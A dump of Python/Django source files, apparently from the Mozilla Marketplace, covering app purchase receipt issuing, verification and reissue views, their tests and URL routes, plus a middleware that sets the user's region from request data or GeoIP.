@mock.patch('mkt.receipts.views.record_action')
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_record_metrics_packaged_app(self, cef, record_action):
# Mimic packaged app.
self.addon.update(is_packaged=True, manifest_url=None,
app_domain='app://f.c')
res = self.client.post(self.url)
eq_(res.status_code, 200)
eq_(record_action.call_args[0][0], 'install')
eq_(record_action.call_args[0][2], {
'app-domain': 'app://f.c',
'app-id': self.addon.pk,
'anonymous': False})
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_cef_logs(self, cef):
res = self.client.post(self.url)
eq_(res.status_code, 200)
eq_(len(cef.call_args_list), 1)
eq_([x[0][2] for x in cef.call_args_list], ['sign'])
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_record_install(self, cef):
res = self.client.post(self.url)
eq_(res.status_code, 200)
installed = self.user.installed_set.all()
eq_(len(installed), 1)
eq_(installed[0].install_type, apps.INSTALL_TYPE_USER)
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_record_multiple_installs(self, cef):
self.client.post(self.url)
res = self.client.post(self.url)
eq_(res.status_code, 200)
eq_(self.user.installed_set.count(), 1)
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_record_receipt(self, cef):
res = self.client.post(self.url)
content = json.loads(res.content)
assert content.get('receipt'), content
class TestReceiptVerify(amo.tests.TestCase):
fixtures = fixture('user_999', 'user_editor', 'user_editor_group',
'group_editor')
def setUp(self):
super(TestReceiptVerify, self).setUp()
self.app = Webapp.objects.create(app_slug='foo', guid=uuid.uuid4())
self.url = reverse('receipt.verify',
args=[self.app.guid])
self.log = AppLog.objects.filter(addon=self.app)
self.reviewer = UserProfile.objects.get(pk=5497308)
def get_mock(self, user=None, **kwargs):
self.verify = mock.Mock()
self.verify.return_value = json.dumps(kwargs)
self.verify.check_without_purchase.return_value = json.dumps(
{'status': 'ok'})
self.verify.invalid.return_value = json.dumps({'status': 'invalid'})
self.verify.user_id = user.pk if user else self.reviewer.pk
return self.verify
def test_post_required(self):
eq_(self.client.get(self.url).status_code, 405)
@mock.patch('mkt.receipts.views.Verify')
def test_empty(self, verify):
vfy = self.get_mock(user=self.reviewer, status='invalid')
# Because the receipt was empty, this never got set and so
# we didn't log it.
vfy.user_id = None
verify.return_value = vfy
res = self.client.post(self.url)
eq_(res.status_code, 200)
eq_(self.log.count(), 0)
eq_(json.loads(res.content)['status'], 'invalid')
@mock.patch('mkt.receipts.views.Verify')
def test_good(self, verify):
verify.return_value = self.get_mock(user=self.reviewer, status='ok')
res = self.client.post(self.url)
eq_(res.status_code, 200)
eq_(self.log.count(), 1)
eq_(json.loads(res.content)['status'], 'ok')
@mock.patch('mkt.receipts.views.Verify')
def test_not_reviewer(self, verify):
self.reviewer.groups.clear()
verify.return_value = self.get_mock(user=self.reviewer, status='ok')
res = self.client.post(self.url)
eq_(res.status_code, 200)
eq_(self.log.count(), 0)
eq_(json.loads(res.content)['status'], 'invalid')
@mock.patch('mkt.receipts.views.Verify')
def test_not_there(self, verify):
verify.return_value = self.get_mock(user=self.reviewer, status='ok')
self.reviewer.delete()
res = self.client.post(self.url)
eq_(res['Access-Control-Allow-Origin'], '*')
eq_(json.loads(res.content)['status'], 'invalid')
@mock.patch('mkt.receipts.views.Verify')
def test_logs(self, verify):
verify.return_value = self.get_mock(user=self.reviewer, status='ok')
eq_(self.log.count(), 0)
res = self.client.post(self.url)
eq_(self.log.count(), 1)
eq_(res.status_code, 200)
@mock.patch('mkt.receipts.views.Verify')
def test_logs_developer(self, verify):
developer = UserProfile.objects.get(pk=999)
AddonUser.objects.create(addon=self.app, user=developer)
verify.return_value = self.get_mock(user=developer, status='ok')
res = self.client.post(self.url)
eq_(res['Access-Control-Allow-Origin'], '*')
eq_(self.log.count(), 1)
eq_(res.status_code, 200)
class TestReceiptIssue(amo.tests.TestCase):
fixtures = fixture('user_999', 'user_editor', 'user_editor_group',
'group_editor', 'webapp_337141')
def setUp(self):
super(TestReceiptIssue, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.url = reverse('receipt.issue', args=[self.app.app_slug])
self.reviewer = UserProfile.objects.get(pk=5497308)
self.user = UserProfile.objects.get(pk=999)
@mock.patch('mkt.receipts.views.create_receipt')
def test_issued(self, create_receipt):
create_receipt.return_value = 'foo'
self.client.login(username=self.reviewer.email, password='password')
res = self.client.post(self.url)
eq_(res.status_code, 200)
eq_(create_receipt.call_args[1]['flavour'], 'reviewer')
eq_(self.reviewer.installed_set.all()[0].install_type,
apps.INSTALL_TYPE_REVIEWER)
def test_get(self):
self.client.login(username=self.reviewer.email, password='password')
res = self.client.get(self.url)
eq_(res.status_code, 405)
def test_issued_anon(self):
res = self.client.post(self.url)
eq_(res.status_code, 403)
def test_issued_not_reviewer(self):
self.client.login(username=self.user, password='password')
res = self.client.post(self.url)
eq_(res.status_code, 403)
@mock.patch('mkt.receipts.views.create_receipt')
def test_issued_developer(self, create_receipt):
create_receipt.return_value = 'foo'
AddonUser.objects.create(user=self.user, addon=self.app)
self.client.login(username=self.user.email, password='password')
res = self.client.post(self.url)
eq_(res.status_code, 200)
eq_(create_receipt.call_args[1]['flavour'], 'developer')
eq_(self.user.installed_set.all()[0].install_type,
apps.INSTALL_TYPE_DEVELOPER)
@mock.patch('mkt.receipts.views.create_receipt')
def test_unicode_name(self, create_receipt):
"""
Regression test to ensure that the CEF log works. Pass through the
app.pk instead of the full unicode name, until the CEF library is
fixed, or heka is used.
"""
create_receipt.return_value = 'foo'
self.app.name = u'\u0627\u0644\u062a\u0637\u0628-news'
self.app.save()
self.client.login(username=self.reviewer.email, password='password')
res = self.client.post(self.url)
eq_(res.status_code, 200)
class TestReceiptCheck(amo.tests.TestCase):
fixtures = fixture('user_999', 'user_editor', 'user_editor_group',
'group_editor', 'webapp_337141')
def setUp(self):
super(TestReceiptCheck, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.app.update(status=amo.STATUS_PENDING)
self.url = reverse('receipt.check',
args=[self.app.guid])
self.reviewer = UserProfile.objects.get(pk=5497308)
self.user = UserProfile.objects.get(pk=999)
def test_anon(self):
eq_(self.client.get(self.url).status_code, 302)
def test_not_reviewer(self):
self.client.login(username=self.user.email, password='password')
eq_(self.client.get(self.url).status_code, 403)
def test_not_there(self):
self.client.login(username=self.reviewer.email, password='password')
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(json.loads(res.content)['status'], False)
def test_there(self):
self.client.login(username=self.reviewer.email, password='password')
amo.log(amo.LOG.RECEIPT_CHECKED, self.app, user=self.reviewer)
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(json.loads(res.content)['status'], True)
class RawRequestFactory(RequestFactory):
"""A request factory that does not encode the body."""
def _encode_data(self, data, content_type):
return data
@mock.patch.object(verify_settings, 'WEBAPPS_RECEIPT_KEY',
amo.tests.AMOPaths.sample_key())
@mock.patch.object(settings, 'SITE_URL', 'https://foo.com')
@mock.patch.object(verify_settings, 'DOMAIN', 'foo.com')
class TestDevhubReceipts(amo.tests.TestCase):
def setUp(self):
self.issue = reverse('receipt.test.issue')
def test_install_page(self):
eq_(self.client.get(reverse('receipt.test.install')).status_code, 200)
def test_details_page(self):
eq_(self.client.get(reverse('receipt.test.details')).status_code, 200)
def test_issue_get(self):
eq_(self.client.get(self.issue).status_code, 405)
def test_issue_none(self):
data = {'receipt_type': 'none', 'manifest_url': 'http://foo.com/'}
res = self.client.post(self.issue, data=data)
eq_(json.loads(res.content)['receipt'], '')
def test_bad_url(self):
data = {'receipt_type': 'none', 'manifest_url': ''}
res = self.client.post(self.issue, data=data)
ok_(json.loads(res.content)['error'], '')
def test_issue_expired(self):
data = {'receipt_type': 'expired', 'manifest_url': 'http://foo.com/'}
res = self.client.post(self.issue, data=data)
data = decode_receipt(json.loads(res.content)['receipt']
.encode('ascii'))
eq_(data['verify'], absolutify(reverse('receipt.test.verify',
kwargs={'status': 'expired'})))
ok_(data['exp'] > (calendar.timegm(time.gmtime()) +
(60 * 60 * 24) - TEST_LEEWAY))
def test_issue_other(self):
data = {'receipt_type': 'foo', 'manifest_url': ''}
res = self.client.post(self.issue, data=data)
ok_(json.loads(res.content)['error'])
def test_verify_fails(self):
req = RawRequestFactory().post('/', '')
res = devhub_verify(req, 'expired')
eq_(json.loads(res.content)['status'], 'invalid')
def test_verify(self):
url = absolutify(reverse('receipt.test.verify',
kwargs={'status': 'expired'}))
receipt = create_test_receipt('http://foo', 'expired')
req = RawRequestFactory().post(url, receipt)
res = devhub_verify(req, 'expired')
eq_(json.loads(res.content)['status'], 'expired')
########NEW FILE########
__FILENAME__ = test_views_api
import json
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_, ok_
from receipts.receipts import Receipt
import amo.tests
from addons.models import Addon, AddonUser
from constants.payments import CONTRIB_NO_CHARGE
from devhub.models import AppLog
from mkt.api.tests.test_oauth import RestOAuth
from mkt.constants import apps
from mkt.receipts.tests.test_verify import sample
from mkt.site.fixtures import fixture
from users.models import UserProfile
class TestAPI(RestOAuth):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestAPI, self).setUp()
self.addon = Addon.objects.get(pk=337141)
self.url = reverse('receipt.install')
self.data = json.dumps({'app': self.addon.pk})
self.profile = self.user
def test_has_cors(self):
self.assertCORS(self.client.post(self.url), 'post')
def post(self, anon=False):
client = self.client if not anon else self.anon
return client.post(self.url, data=self.data)
def test_no_app(self):
self.data = json.dumps({'app': 0})
eq_(self.post().status_code, 400)
def test_app_slug(self):
self.data = json.dumps({'app': self.addon.app_slug})
eq_(self.post().status_code, 201)
def test_record_logged_out(self):
res = self.post(anon=True)
eq_(res.status_code, 403)
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_cef_logs(self, cef):
eq_(self.post().status_code, 201)
eq_(len(cef.call_args_list), 1)
eq_([x[0][2] for x in cef.call_args_list], ['sign'])
@mock.patch('mkt.installs.utils.record_action')
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_record_metrics(self, cef, record_action):
res = self.post()
eq_(res.status_code, 201)
record_action.assert_called_with(
'install', mock.ANY, {'app-domain': u'http://micropipes.com',
'app-id': self.addon.pk,
'region': 'restofworld',
'anonymous': False})
@mock.patch('mkt.installs.utils.record_action')
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_record_metrics_packaged_app(self, cef, record_action):
# Mimic packaged app.
self.addon.update(is_packaged=True, manifest_url=None, app_domain=None)
res = self.post()
eq_(res.status_code, 201)
record_action.assert_called_with(
'install', mock.ANY, {'app-domain': None, 'app-id': self.addon.pk,
'region': 'restofworld', 'anonymous': False})
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_log_metrics(self, cef):
eq_(self.post().status_code, 201)
logs = AppLog.objects.filter(addon=self.addon)
eq_(logs.count(), 1)
eq_(logs[0].activity_log.action, amo.LOG.INSTALL_ADDON.id)
class TestDevhubAPI(RestOAuth):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestDevhubAPI, self).setUp()
self.data = json.dumps({'manifest_url': 'http://foo.com',
'receipt_type': 'expired'})
self.url = reverse('receipt.test')
def test_has_cors(self):
self.assertCORS(self.client.post(self.url), 'post')
def test_decode(self):
res = self.anon.post(self.url, data=self.data)
eq_(res.status_code, 201)
data = json.loads(res.content)
receipt = Receipt(data['receipt'].encode('ascii')).receipt_decoded()
eq_(receipt['typ'], u'test-receipt')
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_cef_log(self, cef):
self.anon.post(self.url, data=self.data)
cef.assert_called_with(mock.ANY, None, 'sign', 'Test receipt signing')
class TestReceipt(RestOAuth):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestReceipt, self).setUp()
self.addon = Addon.objects.get(pk=337141)
self.data = json.dumps({'app': self.addon.pk})
self.profile = UserProfile.objects.get(pk=2519)
self.url = reverse('receipt.install')
def post(self, anon=False):
client = self.client if not anon else self.anon
return client.post(self.url, data=self.data)
def test_pending_free_for_developer(self):
AddonUser.objects.create(addon=self.addon, user=self.profile)
self.addon.update(status=amo.STATUS_PENDING)
eq_(self.post().status_code, 201)
def test_pending_free_for_anonymous(self):
self.addon.update(status=amo.STATUS_PENDING)
self.anon.post(self.url)
eq_(self.post(anon=True).status_code, 403)
def test_pending_paid_for_developer(self):
AddonUser.objects.create(addon=self.addon, user=self.profile)
self.addon.update(status=amo.STATUS_PENDING,
premium_type=amo.ADDON_PREMIUM)
eq_(self.post().status_code, 201)
eq_(self.profile.installed_set.all()[0].install_type,
apps.INSTALL_TYPE_DEVELOPER)
def test_pending_paid_for_anonymous(self):
self.addon.update(status=amo.STATUS_PENDING,
premium_type=amo.ADDON_PREMIUM)
eq_(self.post(anon=True).status_code, 403)
def test_not_record_addon(self):
self.addon.update(type=amo.ADDON_EXTENSION)
r = self.client.post(self.url)
eq_(r.status_code, 400)
@mock.patch('mkt.webapps.models.Webapp.has_purchased')
def test_paid(self, has_purchased):
has_purchased.return_value = True
self.addon.update(premium_type=amo.ADDON_PREMIUM)
r = self.post()
eq_(r.status_code, 201)
def test_own_payments(self):
self.addon.update(premium_type=amo.ADDON_OTHER_INAPP)
eq_(self.post().status_code, 201)
def test_no_charge(self):
self.make_premium(self.addon, '0.00')
eq_(self.post().status_code, 201)
eq_(self.profile.installed_set.all()[0].install_type,
apps.INSTALL_TYPE_USER)
eq_(self.profile.addonpurchase_set.all()[0].type,
CONTRIB_NO_CHARGE)
@mock.patch('mkt.webapps.models.Webapp.has_purchased')
def test_not_paid(self, has_purchased):
has_purchased.return_value = False
self.addon.update(premium_type=amo.ADDON_PREMIUM)
eq_(self.post().status_code, 402)
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_record_install(self, cef):
self.post()
installed = self.profile.installed_set.all()
eq_(len(installed), 1)
eq_(installed[0].install_type, apps.INSTALL_TYPE_USER)
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_record_multiple_installs(self, cef):
self.post()
r = self.post()
eq_(r.status_code, 201)
eq_(self.profile.installed_set.count(), 1)
@mock.patch('mkt.receipts.views.receipt_cef.log')
def test_record_receipt(self, cef):
r = self.post()
ok_(Receipt(r.data['receipt']).receipt_decoded())
class TestReissue(amo.tests.TestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
self.addon = Addon.objects.get(pk=337141)
self.url = reverse('receipt.reissue')
self.data = json.dumps({'app': self.addon.pk})
verify = mock.patch('mkt.receipts.views.Verify.check_full')
self.verify = verify.start()
self.addCleanup(verify.stop)
def test_get(self):
eq_(self.client.get(self.url).status_code, 405)
def test_invalid(self):
self.verify.return_value = {'status': 'invalid'}
res = self.client.post(self.url, data={})
eq_(res.status_code, 400)
def test_valid(self):
self.verify.return_value = {'status': 'valid'}
res = self.client.post(self.url, data={})
eq_(res.status_code, 400)
data = json.loads(res.content)
ok_(not data['receipt'])
ok_(data['status'], 'valid')
def test_expired(self):
self.verify.return_value = {'status': 'expired'}
res = self.client.post(self.url, data=sample,
content_type='text/plain')
eq_(res.status_code, 200)
data = json.loads(res.content)
ok_(data['receipt'])
eq_(data['status'], 'expired')
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
import amo
from . import views
# Note: this URL is embedded in receipts, if you change the URL, make sure
# that you put a redirect in.
app_receipt_patterns = patterns('',
# TODO: remove this?
url('^record$', views.record_anon, name='detail.record'),
)
receipt_patterns = patterns('',
url(r'^verify/%s$' % amo.ADDON_UUID, views.verify,
name='receipt.verify'),
url(r'^issue/%s$' % amo.APP_SLUG, views.issue,
name='receipt.issue'),
url(r'^check/%s$' % amo.ADDON_UUID, views.check,
name='receipt.check'),
)
receipt_api_patterns = patterns('',
url(r'^receipts/install/', views.install, name='receipt.install'),
url(r'^receipts/test/', views.test_receipt, name='receipt.test'),
url(r'^receipts/reissue/', views.reissue, name='receipt.reissue')
)
test_patterns = patterns('',
url('^$', views.devhub_install,
name='receipt.test.install'),
url('^issue/$', views.devhub_receipt,
name='receipt.test.issue'),
url('^details/$', views.devhub_details,
name='receipt.test.details'),
url('^verify/(?P<status>ok|expired|invalid|refunded)/$',
views.devhub_verify,
name='receipt.test.verify'),
)
########NEW FILE########
__FILENAME__ = utils
import calendar
import time
from urllib import urlencode
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
import jwt
from nose.tools import nottest
from receipts.receipts import Receipt
from access import acl
from amo.helpers import absolutify
from lib.crypto import receipt
def get_uuid(app, user):
"""
Returns a users uuid suitable for use in the receipt, by looking up
the purchase table. Otherwise it just returns 'none'.
:params app: the app record.
:params user: the UserProfile record.
"""
try:
return app.addonpurchase_set.get(user=user).uuid
except ObjectDoesNotExist:
return 'none'
def sign(data):
"""
Returns a signed receipt. If the seperate signing server is present then
it will use that. Otherwise just uses JWT.
:params receipt: the receipt to be signed.
"""
if settings.SIGNING_SERVER_ACTIVE:
return receipt.sign(data)
else:
return jwt.encode(data, get_key(), u'RS512')
def create_receipt(webapp, user, uuid, flavour=None):
"""
Creates a receipt for use in payments.
:params app: the app record.
:params user: the UserProfile record.
:params uuid: a uuid placed in the user field for this purchase.
:params flavour: None, developer or reviewer, the flavour of receipt.
"""
assert flavour in [None, 'developer', 'reviewer'], (
'Invalid flavour: %s' % flavour)
time_ = calendar.timegm(time.gmtime())
typ = 'purchase-receipt'
product = {'storedata': urlencode({'id': int(webapp.pk)}),
# Packaged and hosted apps should have an origin. If there
# isn't one, fallback to the SITE_URL.
'url': webapp.origin or settings.SITE_URL}
# Generate different receipts for reviewers or developers.
expiry = time_ + settings.WEBAPPS_RECEIPT_EXPIRY_SECONDS
if flavour:
if not (acl.action_allowed_user(user, 'Apps', 'Review') or
webapp.has_author(user)):
raise ValueError('User %s is not a reviewer or developer' %
user.pk)
# Developer and reviewer receipts should expire after 24 hours.
expiry = time_ + (60 * 60 * 24)
typ = flavour + '-receipt'
verify = absolutify(reverse('receipt.verify', args=[webapp.guid]))
else:
verify = settings.WEBAPPS_RECEIPT_URL
reissue = absolutify(reverse('receipt.reissue'))
receipt = dict(exp=expiry, iat=time_,
iss=settings.SITE_URL, nbf=time_, product=product,
# TODO: This is temporary until detail pages get added.
detail=absolutify(reissue), # Currently this is a 404.
reissue=absolutify(reissue),
typ=typ,
user={'type': 'directed-identifier',
'value': uuid},
verify=verify)
return sign(receipt)
def reissue_receipt(receipt):
"""
Reissues and existing receipt by updating the timestamps and resigning
the receipt. This requires a well formatted receipt, but does not verify
the receipt contents.
:params receipt: an existing receipt
"""
time_ = calendar.timegm(time.gmtime())
receipt_obj = Receipt(receipt)
data = receipt_obj.receipt_decoded()
data.update({
'exp': time_ + settings.WEBAPPS_RECEIPT_EXPIRY_SECONDS,
'iat': time_,
'nbf': time_,
})
return sign(data)
@nottest
def create_test_receipt(root, status):
time_ = calendar.timegm(time.gmtime())
detail = absolutify(reverse('receipt.test.details'))
receipt = {
'detail': absolutify(detail),
'exp': time_ + (60 * 60 * 24),
'iat': time_,
'iss': settings.SITE_URL,
'nbf': time_,
'product': {
'storedata': urlencode({'id': 0}),
'url': root,
},
'reissue': detail,
'typ': 'test-receipt',
'user': {
'type': 'directed-identifier',
'value': 'none'
},
'verify': absolutify(reverse('receipt.test.verify',
kwargs={'status': status}))
}
return sign(receipt)
def get_key():
"""Return a key for using with encode."""
return jwt.rsa_load(settings.WEBAPPS_RECEIPT_KEY)
########NEW FILE########
__FILENAME__ = views
import json
from django import http
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404, render
from django.views.decorators.csrf import csrf_exempt
import commonware.log
from rest_framework.decorators import (authentication_classes,
permission_classes)
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from session_csrf import anonymous_csrf_exempt
from tower import ugettext as _
import amo
import amo.log
from access import acl
from addons.decorators import addon_view_factory
from addons.models import Addon
from amo.decorators import json_view, post_required, write
from constants.payments import CONTRIB_NO_CHARGE
from devhub.models import AppLog
from editors.views import reviewer_required
from lib.cef_loggers import receipt_cef
from lib.crypto.receipt import SigningError
from lib.metrics import record_action
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import cors_api_view
from mkt.constants import apps
from mkt.installs.utils import install_type, record as utils_record
from mkt.receipts import forms
from mkt.receipts.utils import (create_receipt, create_test_receipt, get_uuid,
reissue_receipt)
from mkt.webapps.models import Installed, Webapp
from mkt.prices.models import AddonPurchase
from services.verify import get_headers, Verify
from users.models import UserProfile
log = commonware.log.getLogger('z.receipts')
addon_view = addon_view_factory(qs=Webapp.objects.valid)
addon_all_view = addon_view_factory(qs=Webapp.objects.all)
def _record(request, addon):
logged = request.user.is_authenticated()
premium = addon.is_premium()
# Require login for premium.
if not logged and premium:
return http.HttpResponseRedirect(reverse('users.login'))
ctx = {'addon': addon.pk}
# Don't generate receipts if we're allowing logged-out install.
if logged:
is_dev = request.check_ownership(addon, require_owner=False,
ignore_disabled=True, admin=False)
is_reviewer = acl.check_reviewer(request)
if (not addon.is_webapp() or not addon.is_public() and
not (is_reviewer or is_dev)):
raise http.Http404
if (premium and
not addon.has_purchased(request.amo_user) and
not is_reviewer and not is_dev):
raise PermissionDenied
# If you are reviewer, you get a user receipt. Use the reviewer tools
# to get a reviewer receipt. App developers still get their special
# receipt.
install_type = (apps.INSTALL_TYPE_DEVELOPER if is_dev
else apps.INSTALL_TYPE_USER)
# Log the install.
installed, c = Installed.objects.get_or_create(addon=addon,
user=request.amo_user, install_type=install_type)
# Get a suitable uuid for this receipt.
uuid = get_uuid(addon, request.amo_user)
error = ''
receipt_cef.log(request, addon, 'sign', 'Receipt requested')
try:
receipt = create_receipt(addon, request.amo_user, uuid)
except SigningError:
error = _('There was a problem installing the app.')
ctx.update(receipt=receipt, error=error)
else:
if not addon.is_public() or not addon.is_webapp():
raise http.Http404
amo.log(amo.LOG.INSTALL_ADDON, addon)
record_action('install', request, {
'app-domain': addon.domain_from_url(addon.origin, allow_none=True),
'app-id': addon.pk,
'anonymous': request.user.is_anonymous(),
})
return ctx
@anonymous_csrf_exempt
@json_view
@addon_all_view
@post_required
@write
def record_anon(request, addon):
return _record(request, addon)
@json_view
@addon_all_view
@post_required
@write
def record(request, addon):
return _record(request, addon)
# Set the CORS headers on the response by calling get_headers.
def response(data):
response = http.HttpResponse(data)
for header, value in get_headers(len(data)):
response[header] = value
return response
@csrf_exempt
@post_required
def verify(request, uuid):
# Because this will be called at any point in the future,
# use guid in the URL.
addon = get_object_or_404(Addon, guid=uuid)
receipt = request.read()
verify = Verify(receipt, request.META)
output = verify.check_without_purchase()
# Only reviewers or the developers can use this which is different
# from the standard receipt verification. The user is contained in the
# receipt.
if verify.user_id:
try:
user = UserProfile.objects.get(pk=verify.user_id)
except UserProfile.DoesNotExist:
user = None
if user and (acl.action_allowed_user(user, 'Apps', 'Review')
or addon.has_author(user)):
amo.log(amo.LOG.RECEIPT_CHECKED, addon, user=user)
return response(output)
return response(verify.invalid())
@addon_all_view
@json_view
@post_required
def issue(request, addon):
user = request.amo_user
review = acl.action_allowed_user(user, 'Apps', 'Review') if user else None
developer = addon.has_author(user)
if not (review or developer):
raise PermissionDenied
install, flavour = ((apps.INSTALL_TYPE_REVIEWER, 'reviewer') if review
else (apps.INSTALL_TYPE_DEVELOPER, 'developer'))
installed, c = Installed.objects.safer_get_or_create(addon=addon,
user=request.amo_user, install_type=install)
error = ''
receipt_cef.log(request, addon, 'sign', 'Receipt signing for %s' % flavour)
receipt = None
try:
receipt = create_receipt(addon, user, get_uuid(addon, user),
flavour=flavour)
except SigningError:
error = _('There was a problem installing the app.')
return {'addon': addon.pk, 'receipt': receipt, 'error': error}
@json_view
@reviewer_required
def check(request, uuid):
# Because this will be called at any point in the future,
# use guid in the URL.
addon = get_object_or_404(Addon, guid=uuid)
qs = (AppLog.objects.order_by('-created')
.filter(addon=addon,
activity_log__action=amo.LOG.RECEIPT_CHECKED.id))
return {'status': qs.exists()}
# These methods are for the test of receipts in the devhub.
def devhub_install(request):
return render(request, 'receipts/test_manifest.html',
{'form': forms.TestInstall()})
@anonymous_csrf_exempt
@json_view
@post_required
def devhub_receipt(request):
form = forms.TestInstall(request.POST)
if form.is_valid():
data = form.cleaned_data
if data['receipt_type'] == 'none':
return {'receipt': '', 'error': ''}
receipt_cef.log(request, None, 'sign', 'Test receipt signing')
receipt = create_test_receipt(data['root'], data['receipt_type'])
return {'receipt': receipt, 'error': ''}
return {'receipt': '', 'error': form.errors}
def devhub_details(request):
return render(request, 'receipts/test_details.html')
@csrf_exempt
@post_required
def devhub_verify(request, status):
receipt = request.read()
verify = Verify(receipt, request.META)
return response(json.dumps(verify.check_without_db(status)))
@cors_api_view(['POST'])
@authentication_classes([RestOAuthAuthentication,
RestSharedSecretAuthentication])
@permission_classes([IsAuthenticated])
def install(request):
form = forms.ReceiptForm(request.DATA)
if not form.is_valid():
return Response({'error_message': form.errors}, status=400)
obj = form.cleaned_data['app']
type_ = install_type(request, obj)
if type_ == apps.INSTALL_TYPE_DEVELOPER:
receipt = install_record(obj, request,
apps.INSTALL_TYPE_DEVELOPER)
else:
# The app must be public and if its a premium app, you
# must have purchased it.
if not obj.is_public():
log.info('App not public: %s' % obj.pk)
return Response('App not public.', status=403)
if (obj.is_premium() and
not obj.has_purchased(request.amo_user)):
# Apps that are premium but have no charge will get an
# automatic purchase record created. This will ensure that
# the receipt will work into the future if the price changes.
if obj.premium and not obj.premium.price.price:
log.info('Create purchase record: {0}'.format(obj.pk))
AddonPurchase.objects.get_or_create(addon=obj,
user=request.amo_user, type=CONTRIB_NO_CHARGE)
else:
log.info('App not purchased: %s' % obj.pk)
return Response('You have not purchased this app.', status=402)
receipt = install_record(obj, request, type_)
utils_record(request, obj)
return Response({'receipt': receipt}, status=201)
def install_record(obj, request, install_type):
# Generate or re-use an existing install record.
installed, created = Installed.objects.get_or_create(
addon=obj, user=request.user,
install_type=install_type)
log.info('Installed record %s: %s' % (
'created' if created else 're-used',
obj.pk))
log.info('Creating receipt: %s' % obj.pk)
receipt_cef.log(request._request, obj, 'sign', 'Receipt signing')
uuid = get_uuid(installed.addon, installed.user)
return create_receipt(installed.addon, installed.user, uuid)
@cors_api_view(['POST'])
@permission_classes((AllowAny,))
def test_receipt(request):
form = forms.TestInstall(request.DATA)
if not form.is_valid():
return Response({'error_message': form.errors}, status=400)
receipt_cef.log(request._request, None, 'sign', 'Test receipt signing')
data = {
'receipt': create_test_receipt(form.cleaned_data['root'],
form.cleaned_data['receipt_type'])
}
return Response(data, status=201)
@cors_api_view(['POST'])
@permission_classes((AllowAny,))
def reissue(request):
"""
Reissues an existing receipt, provided from the client. Will only do
so if the receipt is a full receipt and expired.
"""
raw = request.read()
verify = Verify(raw, request.META)
output = verify.check_full()
# We will only re-sign expired receipts.
if output['status'] != 'expired':
log.info('Receipt not expired returned: {0}'.format(output))
receipt_cef.log(request._request, None, 'sign',
'Receipt reissue failed')
output['receipt'] = ''
return Response(output, status=400)
receipt_cef.log(request._request, None, 'sign', 'Receipt reissue signing')
return Response({'reason': '', 'receipt': reissue_receipt(raw),
'status': 'expired'})
########NEW FILE########
__FILENAME__ = middleware
from django.conf import settings
import commonware.log
from django_statsd.clients import statsd
from lib.geoip import GeoIP
import mkt
from mkt.regions.utils import parse_region
log = commonware.log.getLogger('mkt.regions')
class RegionMiddleware(object):
"""Figure out the user's region and set request.REGION accordingly, storing
it on the request.amo_user if there is one."""
def __init__(self):
self.geoip = GeoIP(settings)
def region_from_request(self, request):
address = request.META.get('REMOTE_ADDR')
ip_reg = self.geoip.lookup(address)
log.info('Geodude lookup for {0} returned {1}'
.format(address, ip_reg))
return parse_region(ip_reg) or mkt.regions.RESTOFWORLD
def process_request(self, request):
regions = mkt.regions.REGION_LOOKUP
user_region = restofworld = mkt.regions.RESTOFWORLD
if not getattr(request, 'API', False):
request.REGION = restofworld
mkt.regions.set_region(restofworld)
return
# Try 'region' in POST/GET data first, if it's not there try geoip.
url_region = request.REQUEST.get('region')
if url_region in regions:
statsd.incr('z.regions.middleware.source.url')
user_region = regions[url_region]
log.info('Region {0} specified in URL; region set as {1}'
.format(url_region, user_region.slug))
else:
statsd.incr('z.regions.middleware.source.geoip')
user_region = self.region_from_request(request)
log.info('Region not specified in URL; region set as {0}'
.format(user_region.slug))
# Update the region on the user object if it changed.
amo_user = getattr(request, 'amo_user', None)
if amo_user and amo_user.region != user_region.slug:
amo_user.region = user_region.slug
amo_user.save()
# Persist the region on the request / local thread.
request.REGION = user_region
mkt.regions.set_region(user_region)
########NEW FILE########
__FILENAME__ = test_init
import mock
from nose.tools import eq_
import mkt.constants.regions as regions
from mkt.regions import get_region, set_region
@mock.patch('mkt.regions._local', None)
def test_get_region_empty():
eq_(get_region(), regions.RESTOFWORLD)
@mock.patch('mkt.regions._local')
def test_get_region_not_empty(local):
local.region = 'us'
eq_(get_region(), regions.US)
@mock.patch('mkt.regions._local')
def test_get_region_worldwide(local):
local.region = 'worldwide'
eq_(get_region(), regions.RESTOFWORLD)
@mock.patch('mkt.regions._local')
def test_set_region(local):
local.region = 'us'
eq_(get_region(), regions.US)
set_region('es')
eq_(get_region(), regions.SPAIN)
def test_set_region_object():
set_region(regions.US)
eq_(get_region(), regions.US)
set_region(regions.SPAIN)
eq_(get_region(), regions.SPAIN)
def test_set_region_bad_slug():
set_region('foo')
eq_(get_region(), regions.RESTOFWORLD)
########NEW FILE########
__FILENAME__ = test_middleware
import socket
from django.conf import settings
import mock
from nose.tools import eq_, ok_
import amo.tests
from users.models import UserProfile
import mkt
from mkt.site.fixtures import fixture
_langs = ['cs', 'de', 'en-US', 'es', 'fr', 'pl', 'pt-BR', 'pt-PT']
